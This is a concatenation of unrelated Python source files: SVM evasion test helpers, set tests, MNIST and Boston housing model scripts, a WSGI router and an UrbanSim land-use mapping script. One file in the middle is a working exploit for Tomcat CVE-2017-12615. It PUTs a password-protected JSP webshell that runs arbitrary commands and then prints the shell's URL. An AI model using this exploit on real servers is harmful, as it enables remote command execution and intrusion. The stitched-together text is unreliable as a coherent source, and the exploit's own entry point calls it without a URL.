"""Preparare the data required for attacking a NONLINEAR SVM.
- load a blob 2D dataset
- create a SVM with RBF kernel (C=1, gamma=1) and a minmax preprocessor
Parameters
----------
sparse : bool
seed : int or None
Returns
-------
ds : CDataset
clf : CClassifierSVM
"""
ds = self._load_blobs(
n_feats=2, # Number of dataset features
n_clusters=2, # Number of dataset clusters
sparse=sparse,
seed=seed
)
normalizer = CNormalizerMinMax(feature_range=(-1, 1))
clf = CClassifierSVM(kernel='rbf', C=1, preprocess=normalizer)
return ds, clf
def _prepare_tree_nonlinear_svm(self, sparse, seed):
"""Preparare the data required for attacking a TREE classifier with
surrogate NONLINEAR SVM.
- load a blob 2D dataset
- create a decision tree classifier
- create a surrogate SVM with RBF kernel (C=1, gamma=1)
Parameters
----------
sparse : bool
seed : int or None
Returns
-------
ds : CDataset
clf : CClassifierDecisionTree
clf_surr : CClassifierSVM
"""
ds = self._load_blobs(
n_feats=2, # Number of dataset features
n_clusters=2, # Number of dataset clusters
sparse=sparse,
seed=seed
)
clf = CClassifierDecisionTree(random_state=seed)
clf_surr = CClassifierSVM(kernel='rbf', C=1)
return ds, clf, clf_surr
@staticmethod
def _choose_x0_2c(ds):
"""Choose a starting point having label 1 from a 2-class ds.
Parameters
----------
ds : CDataset
2-class dataset.
Returns
-------
x0 : CArray
Initial attack point.
y0 : CArray
Label of the initial attack point.
"""
if ds.num_classes != 2:
raise ValueError("Only 2-class datasets can be used!")
malicious_idxs = ds.Y.find(ds.Y == 1)
target_idx = 1
x0 = ds.X[malicious_idxs[target_idx], :].ravel()
y0 = +1
return x0, y0
def _run_evasion(self, evas, x0, y0, expected_x=None, expected_y=None):
"""Run evasion on input x.
Parameters
----------
evas : CAttackEvasion
x0 : CArray
Initial attack point.
y0 : CArray
Label of the initial attack point.
expected_x : CArray or None, optional
Expected final optimal point.
expected_y : int or CArray or None, optional
Label of the expected final optimal point.
"""
self.logger.info("Malicious sample: " + str(x0))
self.logger.info("Is sparse?: " + str(x0.issparse))
with self.logger.timer():
y_pred, scores, adv_ds, f_obj = evas.run(x0, y0)
self.logger.info("Starting score: " + str(
evas.classifier.decision_function(x0, y=1).item()))
self.logger.info("Final score: " + str(evas.f_opt))
self.logger.info("x*:\n" + str(evas.x_opt))
self.logger.info("Point sequence:\n" + str(evas.x_seq))
self.logger.info("Score sequence:\n" + str(evas.f_seq))
self.logger.info("Fun Eval: " + str(evas.f_eval))
self.logger.info("Grad Eval: " + str(evas.grad_eval))
# Checking output
self.assertEqual(1, y_pred.size)
self.assertEqual(1, scores.shape[0])
self.assertEqual(1, adv_ds.num_samples)
self.assertEqual(adv_ds.issparse, x0.issparse)
self.assertTrue(is_float(f_obj))
# Compare optimal point with expected
if expected_x is not None:
self.assert_array_almost_equal(
evas.x_opt.todense().ravel(), expected_x, decimal=4)
if expected_y is not None:
self.assert_array_almost_equal(y_pred.item(), expected_y)
@staticmethod
def _constr(evas, c):
"""Return the distance constraint depending on the used distance.
Parameters
----------
evas : CAttackEvasion
Returns
-------
CConstraintL1 or CConstraintL2
"""
# TODO: there is no way to cleanly extract it from evasion object
if evas.distance is "l1":
constr = CConstraintL1(center=c, radius=evas.dmax)
else:
constr = CConstraintL2(center=c, radius=evas.dmax)
return constr
@staticmethod
def _box(evas):
"""Return the bounding box constraint.
Parameters
----------
evas : CAttackEvasion
Returns
-------
CConstraintBox
"""
# TODO: there is no way to cleanly extract it from evasion object
return CConstraintBox(lb=evas.lb, ub=evas.ub)
def _plot_2d_evasion(self, evas, ds, x0, filename, th=0, grid_limits=None):
"""Plot evasion attack results for 2D data.
Parameters
----------
evas : CAttackEvasion
ds : CDataset
x0 : CArray
Initial attack point.
filename : str
Name of the output pdf file.
th : scalar, optional
Scores threshold of the classifier. Default 0.
grid_limits : list of tuple or None, optional
If not specified, will be set as [(-1.5, 1.5), (-1.5, 1.5)].
"""
if self.make_figures is False:
self.logger.debug("Skipping figures...")
return
fig = CFigure(height=6, width=6)
if grid_limits is None:
grid_limits = [(-1.5, 1.5), (-1.5, 1.5)]
fig.sp.plot_ds(ds)
fig.sp.plot_fun(
func=evas.objective_function,
grid_limits=grid_limits, colorbar=False,
n_grid_points=50, plot_levels=False)
fig.sp.plot_decision_regions(
clf=evas.classifier, plot_background=False,
grid_limits=grid_limits,
n_grid_points=50)
fig.sp.plot_constraint(self._box(evas),
n_grid_points=20,
grid_limits=grid_limits)
fig.sp.plot_fun(func=lambda z: self._constr(evas, x0).constraint(z),
plot_background=False,
n_grid_points=50,
grid_limits=grid_limits,
levels=[0],
colorbar=False)
fig.sp.plot_path(evas.x_seq)
fig.savefig(fm.join(self.images_folder, filename), file_format='pdf')
| StarcoderdataPython |
172031 | <gh_stars>0
import sys
import pytest
from natural import N
from uintset import UintSet
def test_len():
assert len(N) == sys.maxsize
def test_contains():
assert 0 in N
assert 1 in N
assert -1 not in N
assert 42 in N
assert sys.maxsize in N
union_cases = [
(N, UintSet()),
(N, UintSet([1])),
(UintSet([1]), N),
(UintSet([1, 100]), N),
]
@pytest.mark.parametrize("first, second", union_cases)
def test_or_op(first, second):
got = first | second
assert got == N
intersection_cases = [
(N, UintSet(), UintSet()),
(N, UintSet([1]), UintSet([1])),
(UintSet([1]), N, UintSet([1])),
(UintSet([1, 100]), N, UintSet([1, 100])),
]
@pytest.mark.parametrize("first, second, want", intersection_cases)
def test_and_op(first, second, want):
got = first & second
assert got == want
| StarcoderdataPython |
3533841 | #! /usr/bin/env python
"""
Produces classifications of MNIST so we have something to develop calibration
tools against. The classifications are saved as a pandas dataframe.
Usage:
$ ./gen_data.py --jobs 60 --output results.pkl
"""
import argparse
import multiprocessing
import time
import numpy as np
import pandas as pd
from sklearn.datasets import fetch_mldata
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression, SGDClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import LinearSVC
def get_mnist(predicate=None, shuffle=True):
"""Load, split, and shuffle the data.
Returns:
A 4-tuple of (X_train, X_test, y_train, y_test)
"""
mnist = fetch_mldata('MNIST original', data_home='.')
X, y = mnist['data'], mnist['target']
X_train, X_test = X[:60_000], X[60_000:]
y_train, y_test = y[:60_000], y[60_000:]
if predicate is not None:
y_train = predicate(y_train)
y_test = predicate(y_test)
if shuffle:
# Some models need shuffling
indices = np.random.permutation(60_000)
X_train = X_train[indices]
y_train = y_train[indices]
return X_train, X_test, y_train, y_test
def predict_proba(clf, X_test):
"""Produce the probability vector for clf on X_test"""
if hasattr(clf, "predict_proba"):
prob = clf.predict_proba(X_test)[:, 1]
else: # use decision function
prob = clf.decision_function(X_test)
prob = (prob - prob.min()) / (prob.max() - prob.min())
return prob
def evens(vec):
"""Convert vec (an ndarray) into a mask"""
return vec % 2 == 0
def classify(clf, X_train, y_train, X_test):
clf.fit(X_train, y_train)
pred = clf.predict(X_test)
prob = predict_proba(clf, X_test)
return pred, prob
if __name__ == '__main__':
np.random.seed(42)
parser = argparse.ArgumentParser()
parser.add_argument('-j', '--jobs', type=int)
parser.add_argument('-o', '--output',
default='sample_classification_results.pkl')
args = parser.parse_args()
# 60 is the number of allowable cores on inferno - this prevents us
# completely tieing up inferno's resources by accident
n_jobs = args.jobs or min(multiprocessing.cpu_count(), 60)
print(f'Using up to {n_jobs} cores')
print(f'Results will be saved at {args.output}')
print()
# We create an even detector so that we have a binary classifier to work
# with that has a decent number of true actuals vs the total
X_train, X_test, y_train, y_test = get_mnist(predicate=evens)
# note: this last one (KNeighborsClassifier) takes a while
classifiers = (LogisticRegression(C=1., solver='lbfgs', n_jobs=n_jobs),
GaussianNB(),
LinearSVC(),
RandomForestClassifier(n_jobs=n_jobs),
SGDClassifier(tol=None, max_iter=5, n_jobs=n_jobs),
KNeighborsClassifier(n_jobs=n_jobs))
headers = []
results = []
for clf in classifiers:
msg = 'Starting classification via {:30}'
# By default, sys.stdout buffers output until a newline is encountered,
# but we're doing all the work in between now and when that happens so
# we have to manually flush the output
print(msg.format(clf.__class__.__name__ + '... '), end='', flush=True)
start = time.time()
pred, prob = classify(clf, X_train, y_train, X_test)
elapsed = time.strftime("%H:%M:%S", time.gmtime(time.time() - start))
print(f'Done [{elapsed}]')
headers.append(clf.__class__.__name__)
results.extend([pred, prob])
print(f'Saving results to {args.output}... ', end='', flush=True)
# Read the data into a dataframe and serialize it to disk
rows = np.array(results).T
columns = pd.MultiIndex.from_product(
[headers, ['Prediction', 'Probability']],
names=['Classifier', 'Method'],
)
df = pd.DataFrame(rows, columns=columns)
df['actual'] = y_test
df.to_pickle(args.output)
print('Done')
| StarcoderdataPython |
274238 | import collections.abc
import inspect
import re
import typing
import wsgiref.simple_server
import webob
import webob.exc
from . import mappers
def generate_sitemap(sitemap: typing.Mapping, prefix: list=None):
"""Create a sitemap template from the given sitemap.
The `sitemap` should be a mapping where the key is a string which
represents a single URI segment, and the value is either another mapping
or a callable (e.g. function) object.
Args:
sitemap: The definition of the routes and their views
prefix: The base url segment which gets prepended to the given map.
Examples:
The sitemap should follow the following format:
>>> {
>>> 'string_literal': {
>>> '': func1,
>>> '{arg}': func2,
>>> },
>>> }
The key points here are thus:
- Any string key not matched by the following rule will be matched
literally
- Any string key surrounded by curly brackets matches a url segment
which represents a parameter whose name is the enclosed string
(i.e. should be a valid keyword argument)
- *note* a side effect of this is that an empty string key will
match all routes leading up to the current given mapping
The above sitemap would compile to the following url mappings:
- /string_literal/ -> calls `func1()`
- /string_literal/{arg}/ -> calls `func2(arg=<the matched value>)`
"""
if prefix is None:
prefix = []
for segment, sub_segment in sitemap.items():
if isinstance(sub_segment, collections.abc.Mapping):
yield from generate_sitemap(sub_segment, prefix + [segment])
elif isinstance(sub_segment, collections.abc.Callable):
if segment:
prefix = prefix + [segment]
yield (prefix, sub_segment)
else:
raise ValueError('Invalid datatype for sitemap')
def compile_route_regex(template):
template = '/'.join(template)
segment_regex = r'\{(\w+)\}'
regex = ['^']
last_position = 0
for match in re.finditer(segment_regex, template):
escaped_section = re.escape(template[last_position:match.start()])
kwarg_name = match.group(1)
regex.append(escaped_section)
regex.append('(?P<{}>\w+)'.format(kwarg_name))
last_position = match.end()
regex.append(re.escape(template[last_position:]))
regex.append('$')
result = ''.join(regex)
return result
def get_parameter_mappings(callable):
result = {}
sig = inspect.signature(callable)
for name, param in sig.parameters.items():
result[name] = param.annotation
return result
def map_params(mappings, context):
result = {}
for name, value in context.items():
mapping = mappings[name]
if mapping == inspect.Signature.empty:
result[name] = value
continue
result[name] = mapping(value)
return result
def get_route_response(sitemap, route_template, request):
route_template = iter(route_template)
next(route_template)
url_context = {}
sitemap_context = sitemap
for segment in route_template:
keyword = None
if segment.startswith('{') and segment.endswith('}'):
keyword = segment[1:-1]
url_context[keyword] = request.urlvars[keyword]
resource_callable = None
sitemap_context = sitemap_context[segment]
if isinstance(sitemap_context, collections.abc.Callable):
if segment:
resource_callable = sitemap_context
elif '' in sitemap_context:
resource_callable = sitemap_context['']
if resource_callable:
param_mappings = get_parameter_mappings(resource_callable)
url_context = map_params(param_mappings, url_context)
response = resource_callable(request, **url_context)
if keyword:
url_context[keyword] = response
return response
def get_callable_return_type(callable):
signature = inspect.signature(callable)
return_type = signature.return_annotation
if return_type == inspect.Signature.empty:
return None
return signature.return_annotation
def inject_wsgi_types(request_type, response_type, base_exc_type):
def make_route_response(sitemap, route_template, callable, conversion_type=mappers.Response):
def replacement(env, start_response):
request = request_type(env)
try:
response = get_route_response(sitemap, route_template, request)
except base_exc_type as e:
response = e
else:
response = conversion.get(response)
return response(env, start_response)
return_type = get_callable_return_type(callable)
if return_type:
conversion_type = return_type
conversion = conversion_type(response_type)
return replacement
return make_route_response
class Tawdry():
request_type = webob.Request
response_type = webob.Response
base_exc_type = webob.exc.HTTPException
def __init__(self, sitemap=None, prefix=''):
"""
Args:
sitemap: asdf
prefix: The base url segment which gets prepended to the given map.
*note* the default of ''. This will cause the generated URI to be
prefixed with '/'. If `None` is passed, there will be no prefix,
but if any other string is passed, it should generally begin with
a '/'.
"""
if sitemap is None:
sitemap = {}
make_route_response = inject_wsgi_types(
self.request_type,
self.response_type,
self.base_exc_type,
)
generated_sitemap = generate_sitemap(sitemap, [prefix])
self._routes = []
for route_template, callable in generated_sitemap:
compiled_route = compile_route_regex(route_template)
controller = make_route_response(sitemap, route_template, callable)
self._routes.append((compiled_route, controller))
def __call__(self, env, start_response):
request = self.request_type(env)
for regex, controller in self._routes:
match = re.match(regex, request.path_info)
if match:
request.urlvars = match.groupdict()
return controller(env, start_response)
return webob.exc.HTTPNotFound()(env, start_response)
def serve(self, make_server=wsgiref.simple_server.make_server, host='127.0.0.1', port=5000):
httpd = make_server(host, port, self)
print('Serving on http://{host}:{port}'.format(host=host, port=port))
try:
httpd.serve_forever()
except KeyboardInterrupt:
print('^C')
| StarcoderdataPython |
4873388 | # -*- coding: utf-8 -*-
import sys
import requests
import time
'''
Usage:
moon.py -u tomcat http://127.0.0.1:8080
shell: http://127.0.0.1:8080/201712615.jsp?pwd=<PASSWORD>&cmd=whoami
影响范围:Linux/Windows Tomcat: 7.0.0 to 7.0.79 - 官网数据
成因:Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件
最好的解决方式是将 conf/web.xml 中对于 DefaultServlet 的 readonly 设置为 true
'''
def attack(URL):
print('[+]开始检测-Tomcat-CVE-2017-12615。[+]')
url = URL + '/T68t8YT86.jsp/'
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
headers={"User-Agent":user_agent}
data="""<%
if("fff".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>"""
try:
requests.put(url, headers=headers, data=data)
time.sleep(2)
verify_response = requests.get(url[:-1], headers=headers)
if verify_response.status_code == 200:
print('存在-Tomcat-CVE-2017-12615!!!')
print('shell: ' + url[:-1]+'?pwd=fff&cmd=whoami')
else :
print('访问shell地址:'+verify_response.status_code)
print("未发现-Tomcat-CVE-2017-12615。")
except :
print("未发现-Tomcat-CVE-2017-12615。")
print('[+]检测结束-Tomcat-CVE-2017-12615。[+]')
print('\n')
if __name__ == "__main__":
attack() | StarcoderdataPython |
248995 | import json
import numpy as np
import pandas as pd
import pickle
from sklearn import ensemble
from sklearn import datasets
from sklearn.utils import shuffle
from sklearn.metrics import mean_squared_error
from mlserve import build_schema
boston = datasets.load_boston()
X, y = shuffle(boston.data, boston.target, random_state=13)
X = X.astype(np.float32)
offset = int(X.shape[0] * 0.9)
X_train, y_train = X[:offset], y[:offset]
X_test, y_test = X[offset:], y[offset:]
params = {
'n_estimators': 500,
'max_depth': 4,
'min_samples_split': 2,
'learning_rate': 0.01,
'loss': 'ls',
}
clf = ensemble.GradientBoostingRegressor(**params)
clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
mse = mean_squared_error(y_test, clf.predict(X_test))
print('MSE: %.4f' % mse)
columns = list(boston.feature_names) + ['target']
data = np.c_[boston.data, boston.target]
df = pd.DataFrame(data=data, columns=columns)
model_file = 'boston_gbr.pkl'
print('Writing model')
with open(model_file, 'wb') as f:
pickle.dump(clf, f)
print('Writing dataset schema')
schema = build_schema(df)
with open('boston_schema.json', 'w') as f:
json.dump(schema, f, indent=4, sort_keys=True)
| StarcoderdataPython |
3530461 | #
# Create 2015 tazdata map from UrbanSim input layer(s) using building data and pipeline data
# Reads
# 1) UrbanSim basemap h5 (URBANSIM_BASEMAP_FILE), parcels and buildings
# 2) Development pipeline csv (URBANSIM_BASEMAP_FILE)
# 3) Employment taz data csv (EMPLOYMENT_FILE)
#
# Outputs
#
# Notes:
# - zone_id and county/county_id aren't always consistent with the TM mapping between zones/county
# (https://github.com/BayAreaMetro/travel-model-one/blob/master/utilities/geographies/taz-superdistrict-county.csv)
# This script assumes the zone_id is accurate and pull the county from the TM correspondence file
# TODO: report on these?
#
# for arcpy:
# set PATH=C:\Program Files\ArcGIS\Pro\bin\Python\envs\arcgispro-py3
import logging,os,re,sys,time
import numpy, pandas
NOW = time.strftime("%Y%b%d.%H%M")
# taz-county file
TAZ_COUNTY_FILE = "X:\\travel-model-one-master\\utilities\\geographies\\taz-superdistrict-county.csv"
# taz shapefile
TAZ_SHPFILE = "M:\\Data\\GIS layers\\TM1_taz\\bayarea_rtaz1454_rev1_WGS84.shp"
# reference for creation:
# Create and share 2015 tazdata from basemap plus development pipeline with MTC planners @
# https://app.asana.com/0/385259290425521/1165636787387665/f
if os.getenv("USERNAME")=="lzorn":
# use local dir to make things faster
URBANSIM_LOCAL_DIR = "C:\\Users\\lzorn\\Documents\\UrbanSim_InputMapping"
# from https://mtcdrive.box.com/s/w0fmrz85l9cti2byd6rjqu9hv0m2edlq
URBANSIM_BASEMAP_FILE = "2020_03_20_bayarea_v6.h5"
# from https://mtcdrive.box.com/s/wcxlgwov5l6s6p0p0vh2xj1ekdynxxw5
URBANSIM_PIPELINE_FILE= "pipeline_2020Mar20.1512.csv"
URBANSIM_PIPELINE_GDB = "devproj_2020Mar20.1512.gdb"
# employment data
EMPLOYMENT_FILE = "X:\\petrale\\applications\\travel_model_lu_inputs\\2015\\TAZ1454 2015 Land Use.csv"
OUTPUT_DIR = os.path.join(URBANSIM_LOCAL_DIR, "map_data")
LOG_FILE = os.path.join(OUTPUT_DIR, "create_tazdata_devpipeline_map_{}.log".format(NOW))
# building types
BUILDING_TYPE_FILE = "X:\\petrale\\incoming\\dv_buildings_det_type_lu.csv"
# with activity categories
BUILDING_TYPE_ACTIVITY_FILE = "X:\\petrale\\TableauAliases.xlsx"
# geodatabase for arcpy and map
WORKSPACE_GDB = "C:\\Users\\lzorn\\Documents\\UrbanSim_InputMapping\\UrbanSim_InputMapping.gdb"
ARCGIS_PROJECT = "C:\\Users\\lzorn\\Documents\\UrbanSim_InputMapping\\UrbanSim_InputMapping.aprx"
# year buit categories we care about
# name, min, max
YEAR_BUILT_CATEGORIES = [
("0000-2000", 0,2000),
("2001-2010",2001,2010),
("2011-2015",2011,2015),
("2016-2020",2016,2020),
("2021-2030",2021,2030),
("2031-2050",2031,2050),
]
# aggregate
YEAR_BUILT_CATEGORIES_AGG = [
("0000-2015", 0,2015),
("2016-2050",2016,2050),
]
COUNTY_ID_NAME = [
("Alameda" , 1),
("Contra Costa" ,13),
("Marin" ,41),
("Napa" ,55),
("San Francisco",75),
("San Mateo" ,81),
("Santa Clara" ,85),
("Solano" ,95),
("Sonoma" ,97),
]
COUNTY_ID_NAME_DF = pandas.DataFrame(COUNTY_ID_NAME, columns=["county","county_id"])
def set_year_built_category(df):
# set year_built_category, year_built_category_agg columns based on YEAR_BUILT_CATEGORIES and year_built column
df["year_built_category"] = "????-????"
for category in YEAR_BUILT_CATEGORIES:
CAT_NAME = category[0]
YEAR_MIN = category[1]
YEAR_MAX = category[2]
df.loc[(df.year_built >= YEAR_MIN)&(df.year_built <= YEAR_MAX), "year_built_category"] = CAT_NAME
df["year_built_category_agg"] = "????-????"
for category in YEAR_BUILT_CATEGORIES_AGG:
CAT_NAME = category[0]
YEAR_MIN = category[1]
YEAR_MAX = category[2]
df.loc[(df.year_built >= YEAR_MIN)&(df.year_built <= YEAR_MAX), "year_built_category_agg"] = CAT_NAME
return df
def warn_zone_county_disagreement(df):
# check if zone/county mapping disagree with the TM mapping and log issues
# TODO
pass
if __name__ == '__main__':
# pandas options
pandas.options.display.max_rows = 999
if not os.path.exists(OUTPUT_DIR): os.mkdir(OUTPUT_DIR)
# create logger
logger = logging.getLogger(__name__)
logger.setLevel('DEBUG')
# console handler
ch = logging.StreamHandler()
ch.setLevel('INFO')
ch.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p'))
logger.addHandler(ch)
# file handler
fh = logging.FileHandler(LOG_FILE, mode='w')
fh.setLevel('DEBUG')
fh.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p'))
logger.addHandler(fh)
logger.info("Output dir: {}".format(OUTPUT_DIR))
####################################
taz_sd_county_df = pandas.read_csv(TAZ_COUNTY_FILE)
logger.info("Read {}; head:\n{}".format(TAZ_COUNTY_FILE, taz_sd_county_df.head()))
# let's just keep taz/county
taz_sd_county_df = taz_sd_county_df[["ZONE","COUNTY_NAME", "SD_NAME", "SD_NUM_NAME"]]
taz_sd_county_df.rename(columns={"ZONE":"zone_id", "COUNTY_NAME":"county"},inplace=True)
# and county_id
taz_sd_county_df = pandas.merge(left=taz_sd_county_df, right=COUNTY_ID_NAME_DF)
logger.debug("taz_sd_county_df head:\n{}".format(taz_sd_county_df.head()))
####################################
building_types_df = pandas.read_csv(BUILDING_TYPE_FILE, skipinitialspace=True)
building_types_df.set_index("building_type_det", inplace=True)
logger.info("Read {}:\n{}".format(BUILDING_TYPE_FILE, building_types_df))
BUILDING_TYPE_TO_DESC = building_types_df["detailed description"].to_dict()
BUILDING_TYPE_TO_DESC["all"] = "all"
logger.debug("BUILDING_TYPE_TO_DESC: {}".format(BUILDING_TYPE_TO_DESC))
building_activity_df = pandas.read_excel(BUILDING_TYPE_ACTIVITY_FILE, sheet_name="building_type")
building_types_df = pandas.merge(left=building_types_df, right=building_activity_df,
how="left", left_index=True, right_on="building_type_det")
logger.debug("building_types_df: \n{}".format(building_types_df))
####################################
tm_lu_df = pandas.read_csv(EMPLOYMENT_FILE)
logger.info("Read {}; head:\n{}".format(EMPLOYMENT_FILE, tm_lu_df.head()))
tm_lu_df.rename(columns={"ZONE":"zone_id"}, inplace=True)
# keep only employment, tothh, totpop, hhpop
tm_lu_df = tm_lu_df[["zone_id","TOTHH","TOTPOP","HHPOP","TOTEMP","RETEMPN","FPSEMPN","HEREMPN","AGREMPN","MWTEMPN","OTHEMPN"]]
####################################
logger.info("Reading parcels and buildings from {}".format(os.path.join(URBANSIM_LOCAL_DIR, URBANSIM_BASEMAP_FILE)))
# use this for parcel_id (index), county_id, zone_id, acres
parcels_df = pandas.read_hdf(os.path.join(URBANSIM_LOCAL_DIR, URBANSIM_BASEMAP_FILE), key='parcels')
# logger.info(parcels_df.dtypes)
parcels_df = parcels_df[["zone_id","acres"]].reset_index().rename(columns={"acres":"parcel_acres"})
logger.info("parcels_df.head():\n{}".format(parcels_df.head()))
# sum parcel acres to zone
parcels_zone_df = parcels_df.groupby(["zone_id"]).agg({"parcel_acres":"sum"}).reset_index()
logger.info("parcels_zone_df:\n{}".format(parcels_zone_df.head()))
buildings_df = pandas.read_hdf(os.path.join(URBANSIM_LOCAL_DIR, URBANSIM_BASEMAP_FILE), key='buildings')
logger.info("buildings_df.dtypes:\n{}".format(buildings_df.dtypes))
#logger.info(buildings_df.head())
# segment year buit to 0000-2000, 2001-2010, 2011-2015
buildings_df = set_year_built_category(buildings_df)
logger.info("buildings_df by year_built_category:\n{}".format(buildings_df["year_built_category"].value_counts()))
# join buildings to parcel to get the zone
buildings_df = pandas.merge(left=buildings_df, right=parcels_df[["parcel_id","zone_id"]],
how="left", left_on=["parcel_id"], right_on=["parcel_id"])
buildings_no_year_built = buildings_df.loc[pandas.isnull(buildings_df.year_built)]
if len(buildings_no_year_built) > 0:
logger.warn("buildings_df has {} rows with no year_built:\n{}".format(len(buildings_no_year_built), buildings_no_year_built))
else:
logger.info("buildings_df has 0 rows with no year_built")
buildings_no_building_type = buildings_df.loc[pandas.isnull(buildings_df.building_type)]
if len(buildings_no_building_type) > 0:
logger.warn("buildings_df has {} rows with no building_type:\n{}".format(len(buildings_no_building_type), buildings_no_building_type))
else:
logger.info("buildings_df has 0 rows with no building_type")
#### sum to zone by year_built_category and building_type: residential_units, residential_sqft, non_residential_sqft
buildings_zone_btype_df = buildings_df.groupby(["zone_id","year_built_category_agg","year_built_category","building_type"]).agg(
{"residential_units" :"sum",
"building_sqft" :"sum",
"residential_sqft" :"sum",
"non_residential_sqft":"sum"})
buildings_zone_btype_df.reset_index(inplace=True)
buildings_zone_btype_df["source"] = "buildings"
# reorder
buildings_zone_btype_df = buildings_zone_btype_df[["zone_id","source",
"year_built_category_agg","year_built_category","building_type",
"residential_units","building_sqft","residential_sqft","non_residential_sqft"]]
logger.info("buildings_zone_btype_df.head():\n{}".format(buildings_zone_btype_df.head()))
logger.info("buildings_zone_btype_df.dtypes:\n{}".format(buildings_zone_btype_df.dtypes))
#### sum to zone by year_built_category and NOT building_type: residential_units, residential_sqft, non_residential_sqft
buildings_zone_df = buildings_df.groupby(["zone_id","year_built_category_agg","year_built_category"]).agg(
{"residential_units" :"sum",
"building_sqft" :"sum",
"residential_sqft" :"sum",
"non_residential_sqft":"sum"})
buildings_zone_df.reset_index(inplace=True)
buildings_zone_df["source"] = "buildings"
buildings_zone_df["building_type"] = "all"
# reorder
buildings_zone_df = buildings_zone_df[list(buildings_zone_btype_df.columns.values)]
logger.info("buildings_zone_df.head():\n{}".format(buildings_zone_df.head()))
logger.info("buildings_zone_df.dtypes:\n{}".format(buildings_zone_df.dtypes))
####################################
# read pipeline file
logger.info("Reading pipeline from {}".format(os.path.join(URBANSIM_LOCAL_DIR, URBANSIM_PIPELINE_FILE)))
pipeline_df = pandas.read_csv(os.path.join(URBANSIM_LOCAL_DIR, URBANSIM_PIPELINE_FILE))
logger.info("pipeline_df.head():\n{}".format(pipeline_df.head()))
logger.info("pipeline_df.dtypes:\n{}".format(pipeline_df.dtypes))
# logger.info("pipeline_df by year_built:\n{}".format(pipeline_df["year_built"].value_counts()))
pipeline_df = set_year_built_category(pipeline_df)
logger.info("pipeline_df by year_built_category:\n{}".format(pipeline_df["year_built_category"].value_counts()))
logger.info("pipeline_df by year_built_category_agg:\n{}".format(pipeline_df["year_built_category_agg"].value_counts()))
pipeline_no_year_built = pipeline_df.loc[pandas.isnull(pipeline_df.year_built)]
if len(pipeline_no_year_built) > 0:
logger.warn("pipeline_df has {} rows with no year_built:\n{}".format(len(pipeline_no_year_built), pipeline_no_year_built))
else:
logger.info("pipeline_df has 0 rows with no year_built")
pipeline_no_building_type = pipeline_df.loc[pandas.isnull(pipeline_df.building_type)]
if len(pipeline_no_building_type) > 0:
logger.warn("pipeline_df has {} rows with no building_type:\n{}".format(len(pipeline_no_building_type), pipeline_no_building_type))
else:
logger.info("pipeline_df has 0 rows with no building_type")
# sum to zone by year_built_category and building_type
# assume residential_sqft = building_sqft - non_residential_sqft
pipeline_df["residential_sqft"] = pipeline_df["building_sqft"] - pipeline_df["non_residential_sqft"]
#### sum to zone by year_built_category and building_type: residential_units, residential_sqft, non_residential_sqft
pipeline_zone_btype_df = pipeline_df.groupby(["ZONE_ID","year_built_category_agg","year_built_category","building_type"]).agg(
{"residential_units" :"sum",
"building_sqft" :"sum",
"residential_sqft" :"sum",
"non_residential_sqft":"sum"})
pipeline_zone_btype_df.reset_index(inplace=True)
pipeline_zone_btype_df.rename(columns={"ZONE_ID":"zone_id"}, inplace=True)
pipeline_zone_btype_df.loc[ pandas.isnull(pipeline_zone_btype_df.zone_id), "zone_id"] = 0 # null => 0
pipeline_zone_btype_df.zone_id = pipeline_zone_btype_df.zone_id.astype(int)
pipeline_zone_btype_df["source"] = "pipeline"
pipeline_zone_btype_df = pipeline_zone_btype_df[list(buildings_zone_btype_df.columns)]
logger.info("pipeline_zone_btype_df.head():\n{}".format(pipeline_zone_btype_df.head()))
logger.info("pipeline_zone_btype_df.dtypes:\n{}".format(pipeline_zone_btype_df.dtypes))
#### sum to zone by year_built_category and NOT building_type: residential_units, residential_sqft, non_residential_sqft
pipeline_zone_df = pipeline_df.groupby(["ZONE_ID","year_built_category_agg","year_built_category"]).agg(
{"residential_units" :"sum",
"building_sqft" :"sum",
"residential_sqft" :"sum",
"non_residential_sqft":"sum"})
pipeline_zone_df.reset_index(inplace=True)
pipeline_zone_df.rename(columns={"ZONE_ID":"zone_id"}, inplace=True)
pipeline_zone_df.loc[ pandas.isnull(pipeline_zone_df.zone_id), "zone_id"] = 0 # null => 0
pipeline_zone_df.zone_id = pipeline_zone_df.zone_id.astype(int)
pipeline_zone_df["source"] = "pipeline"
pipeline_zone_df["building_type"] = "all"
pipeline_zone_df = pipeline_zone_df[list(buildings_zone_btype_df.columns)]
logger.info("pipeline_zone_df.head():\n{}".format(pipeline_zone_df.head()))
logger.info("pipeline_zone_df.dtypes:\n{}".format(pipeline_zone_df.dtypes))
####################################
# take buildings & pipeline by zone
zone_df = pandas.concat([buildings_zone_btype_df,
buildings_zone_df,
pipeline_zone_btype_df,
pipeline_zone_df], axis="index")
logger.info("zone_df.head():\n{}".format(zone_df.head()))
logger.debug("zone_df for zone_id=1: \n{}".format(zone_df.loc[zone_df.zone_id==1]))
# pivot on buildings/pipeline including ALL building types
zone_piv_df = zone_df.pivot_table(index ="zone_id",
columns=["source","year_built_category","building_type"],
values =["residential_units", "building_sqft", "residential_sqft", "non_residential_sqft"],
aggfunc=numpy.sum)
logger.info("zone_piv_df.head():\n{}".format(zone_piv_df.head()))
zone_piv_df.reset_index(inplace=True)
logger.debug("zone_piv_df for zone_id=1: \n{}".format(zone_piv_df.loc[zone_piv_df.zone_id==1].squeeze()))
# convert column names from tuples
new_cols = []
for col in zone_piv_df.columns.values:
if col[1] == '': # ('zone_id', '', '', '')
new_cols.append(col[0])
else: # ('building_sqft', 'buildings', '0000-2000', 'HM')
new_cols.append(col[1]+" "+col[2]+" "+col[3]+" "+col[0])
zone_piv_df.columns = new_cols
logger.debug("zone_piv_df.head():\n{}".format(zone_piv_df.head()))
